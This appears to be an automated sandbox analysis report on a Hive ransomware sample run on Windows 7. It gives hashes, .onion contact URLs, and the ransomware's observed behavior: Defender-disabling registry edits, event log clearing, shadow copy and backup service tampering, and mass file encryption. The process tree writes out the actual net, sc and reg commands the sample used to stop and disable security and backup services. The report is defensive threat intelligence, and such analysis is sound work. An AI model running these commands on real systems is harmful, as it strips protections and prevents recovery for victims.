Resubmissions
23-12-2022 20:19
221223-y39gvahb28 1023-12-2022 19:54
221223-ymz88scc8w 1023-12-2022 19:42
221223-yerbcsha78 10Analysis
-
max time kernel
1611s -
max time network
1626s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
23-12-2022 20:19
Behavioral task
behavioral1
Sample
211xahcou.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
hive.exe
Resource
win7-20220812-en
Behavioral task
behavioral3
Sample
sjl8j6ap3.exe
Resource
win7-20220901-en
Behavioral task
behavioral4
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20220812-en
General
-
Target
211xahcou.exe
-
Size
3.9MB
-
MD5
0e4d44dde522c07d09d9e3086cfae803
-
SHA1
d8dc26e2094869a0da78ecb47494c931419302dc
-
SHA256
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
-
SHA512
ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
-
SSDEEP
49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO
Malware Config
Extracted
C:\Program Files\7-Zip\n8pw_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 268 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 1184 wevtutil.exe 1552 wevtutil.exe 828 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1204 bcdedit.exe 1220 bcdedit.exe -
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\DebugConnect.png.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File renamed C:\Users\Admin\Pictures\DisableRestart.crw => C:\Users\Admin\Pictures\DisableRestart.crw.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Users\Admin\Pictures\DisableRestart.crw.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File renamed C:\Users\Admin\Pictures\ResumeSave.png => C:\Users\Admin\Pictures\ResumeSave.png.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Users\Admin\Pictures\ResumeSave.png.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File renamed C:\Users\Admin\Pictures\SyncUndo.tif => C:\Users\Admin\Pictures\SyncUndo.tif.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Users\Admin\Pictures\SyncUndo.tif.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File renamed C:\Users\Admin\Pictures\DebugConnect.png => C:\Users\Admin\Pictures\DebugConnect.png.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hiring Requisition - Customized.fdt.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\n8pw_HOW_TO_DECRYPT.txt 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00449_.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN108.XML.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\n8pw_HOW_TO_DECRYPT.txt 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Beige.css.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGN.CFG.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\mshwLatin.dll.mui 211xahcou.exe File opened for modification C:\Program Files\DVD Maker\es-ES\WMM2CLIP.dll.mui 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01291_.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0279644.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15171_.GIF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.InfoPath.xml.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Solstice.thmx.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Manila.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kiritimati.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\js\calendar.js 211xahcou.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ESEN\MSB1ESEN.ITS.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00809_.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\ROAD_01.MID.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-right.png 211xahcou.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01140_.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR42F.GIF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Windows Media Player\en-US\mpvis.dll.mui 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01161_.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FORM.JS.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\n8pw_HOW_TO_DECRYPT.txt 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_06.MID.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00578_.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Music.emf 211xahcou.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047_576black.png 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107722.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151047.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185818.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\n8pw_HOW_TO_DECRYPT.txt 211xahcou.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH.HXS.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_left.png 211xahcou.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\n8pw_HOW_TO_DECRYPT.txt 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Proof.es\Proof.XML.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00382_.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsVersion1Warning.htm.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\mshwLatin.dll.mui 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02464_.WMF.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html.R1Gl98il5m4toqxkBDnKIAZOWbveS8hymKx_qoEFQtn_IAAAACAAAAA0.cv2gj 211xahcou.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 748 sc.exe 1568 sc.exe 1304 sc.exe 1936 sc.exe 1804 sc.exe 948 sc.exe 1768 sc.exe 648 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1612 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2160 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2196 PING.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 872 powershell.exe 1264 powershell.exe 1440 211xahcou.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1184 wevtutil.exe Token: SeBackupPrivilege 1184 wevtutil.exe Token: SeSecurityPrivilege 1552 wevtutil.exe Token: SeBackupPrivilege 1552 wevtutil.exe Token: SeSecurityPrivilege 828 wevtutil.exe Token: SeBackupPrivilege 828 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1972 wmic.exe Token: SeSecurityPrivilege 1972 wmic.exe Token: SeTakeOwnershipPrivilege 1972 wmic.exe Token: SeLoadDriverPrivilege 1972 wmic.exe Token: SeSystemProfilePrivilege 1972 wmic.exe Token: SeSystemtimePrivilege 1972 wmic.exe Token: SeProfSingleProcessPrivilege 1972 wmic.exe Token: SeIncBasePriorityPrivilege 1972 wmic.exe Token: SeCreatePagefilePrivilege 1972 wmic.exe Token: SeBackupPrivilege 1972 wmic.exe Token: SeRestorePrivilege 1972 wmic.exe Token: SeShutdownPrivilege 1972 wmic.exe Token: SeDebugPrivilege 1972 wmic.exe Token: SeSystemEnvironmentPrivilege 1972 wmic.exe Token: SeRemoteShutdownPrivilege 1972 wmic.exe Token: SeUndockPrivilege 1972 wmic.exe Token: SeManageVolumePrivilege 1972 wmic.exe Token: 33 1972 wmic.exe Token: 34 1972 wmic.exe Token: 35 1972 wmic.exe Token: SeIncreaseQuotaPrivilege 1456 wmic.exe Token: SeSecurityPrivilege 1456 wmic.exe Token: SeTakeOwnershipPrivilege 1456 wmic.exe Token: SeLoadDriverPrivilege 1456 wmic.exe Token: SeSystemProfilePrivilege 1456 wmic.exe Token: SeSystemtimePrivilege 1456 wmic.exe Token: SeProfSingleProcessPrivilege 1456 wmic.exe Token: SeIncBasePriorityPrivilege 1456 wmic.exe Token: SeCreatePagefilePrivilege 1456 wmic.exe Token: SeBackupPrivilege 1456 wmic.exe Token: SeRestorePrivilege 1456 wmic.exe Token: SeShutdownPrivilege 1456 wmic.exe Token: SeDebugPrivilege 1456 wmic.exe Token: SeSystemEnvironmentPrivilege 1456 wmic.exe Token: SeRemoteShutdownPrivilege 1456 wmic.exe Token: SeUndockPrivilege 1456 wmic.exe Token: SeManageVolumePrivilege 1456 wmic.exe Token: 33 1456 wmic.exe Token: 34 1456 wmic.exe Token: 35 1456 wmic.exe Token: SeIncreaseQuotaPrivilege 1456 wmic.exe Token: SeSecurityPrivilege 1456 wmic.exe Token: SeTakeOwnershipPrivilege 1456 wmic.exe Token: SeLoadDriverPrivilege 1456 wmic.exe Token: SeSystemProfilePrivilege 1456 wmic.exe Token: SeSystemtimePrivilege 1456 wmic.exe Token: SeProfSingleProcessPrivilege 1456 wmic.exe Token: SeIncBasePriorityPrivilege 1456 wmic.exe Token: SeCreatePagefilePrivilege 1456 wmic.exe Token: SeBackupPrivilege 1456 wmic.exe Token: SeRestorePrivilege 1456 wmic.exe Token: SeShutdownPrivilege 1456 wmic.exe Token: SeDebugPrivilege 1456 wmic.exe Token: SeSystemEnvironmentPrivilege 1456 wmic.exe Token: SeRemoteShutdownPrivilege 1456 wmic.exe Token: SeUndockPrivilege 1456 wmic.exe Token: SeManageVolumePrivilege 1456 wmic.exe Token: 33 1456 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1440 wrote to memory of 1348 1440 211xahcou.exe 28 PID 1440 wrote to memory of 1348 1440 211xahcou.exe 28 PID 1440 wrote to memory of 1348 1440 211xahcou.exe 28 PID 1348 wrote to memory of 872 1348 net.exe 30 PID 1348 wrote to memory of 872 1348 net.exe 30 PID 1348 wrote to memory of 872 1348 net.exe 30 PID 1440 wrote to memory of 688 1440 211xahcou.exe 31 PID 1440 wrote to memory of 688 1440 211xahcou.exe 31 PID 1440 wrote to memory of 688 1440 211xahcou.exe 31 PID 688 wrote to memory of 580 688 net.exe 33 PID 688 wrote to memory of 580 688 net.exe 33 PID 688 wrote to memory of 580 688 net.exe 33 PID 1440 wrote to memory of 668 1440 211xahcou.exe 34 PID 1440 wrote to memory of 668 1440 211xahcou.exe 34 PID 1440 wrote to memory of 668 1440 211xahcou.exe 34 PID 668 wrote to memory of 984 668 net.exe 36 PID 668 wrote to memory of 984 668 net.exe 36 PID 668 wrote to memory of 984 668 net.exe 36 PID 1440 wrote to memory of 1880 1440 211xahcou.exe 37 PID 1440 wrote to memory of 1880 1440 211xahcou.exe 37 PID 1440 wrote to memory of 1880 1440 211xahcou.exe 37 PID 1880 wrote to memory of 1184 1880 net.exe 39 PID 1880 wrote to memory of 1184 1880 net.exe 39 PID 1880 wrote to memory of 1184 1880 net.exe 39 PID 1440 wrote to memory of 1924 1440 211xahcou.exe 40 PID 1440 wrote to memory of 1924 1440 211xahcou.exe 40 PID 1440 wrote to memory of 1924 1440 211xahcou.exe 40 PID 1924 wrote to memory of 1500 1924 net.exe 42 PID 1924 wrote to memory of 1500 1924 net.exe 42 PID 1924 wrote to memory of 1500 1924 net.exe 42 PID 1440 wrote to memory of 1496 1440 211xahcou.exe 43 PID 1440 wrote to memory of 1496 1440 211xahcou.exe 43 PID 1440 wrote to memory of 1496 1440 211xahcou.exe 43 PID 1496 wrote to memory of 1696 1496 net.exe 45 PID 1496 wrote to memory of 1696 1496 net.exe 45 PID 1496 wrote to memory of 1696 1496 net.exe 45 PID 1440 wrote to memory of 864 1440 211xahcou.exe 46 PID 1440 wrote to memory of 864 1440 211xahcou.exe 46 PID 1440 wrote to memory of 864 1440 211xahcou.exe 46 PID 864 wrote to memory of 928 864 net.exe 48 PID 864 wrote to memory of 928 864 net.exe 48 PID 864 wrote to memory of 928 864 net.exe 48 PID 1440 wrote to memory of 1700 1440 211xahcou.exe 49 PID 1440 wrote to memory of 1700 1440 211xahcou.exe 49 PID 1440 wrote to memory of 1700 1440 211xahcou.exe 49 PID 1700 wrote to memory of 1824 1700 net.exe 51 PID 1700 wrote to memory of 1824 1700 net.exe 51 PID 1700 wrote to memory of 1824 1700 net.exe 51 PID 1440 wrote to memory of 1768 1440 211xahcou.exe 52 PID 1440 wrote to memory of 1768 1440 211xahcou.exe 52 PID 1440 wrote to memory of 1768 1440 211xahcou.exe 52 PID 1440 wrote to memory of 648 1440 211xahcou.exe 54 PID 1440 wrote to memory of 648 1440 211xahcou.exe 54 PID 1440 wrote to memory of 648 1440 211xahcou.exe 54 PID 1440 wrote to memory of 748 1440 211xahcou.exe 56 PID 1440 wrote to memory of 748 1440 211xahcou.exe 56 PID 1440 wrote to memory of 748 1440 211xahcou.exe 56 PID 1440 wrote to memory of 1568 1440 211xahcou.exe 58 PID 1440 wrote to memory of 1568 1440 211xahcou.exe 58 PID 1440 wrote to memory of 1568 1440 211xahcou.exe 58 PID 1440 wrote to memory of 1304 1440 211xahcou.exe 60 PID 1440 wrote to memory of 1304 1440 211xahcou.exe 60 PID 1440 wrote to memory of 1304 1440 211xahcou.exe 60 PID 1440 wrote to memory of 1936 1440 211xahcou.exe 62
Processes
-
C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:872
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:580
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:984
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1184
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1500
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1696
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:928
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1824
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:1768
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:648
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:748
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:1568
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:1304
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:1936
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:1804
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:948
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1520
-
-
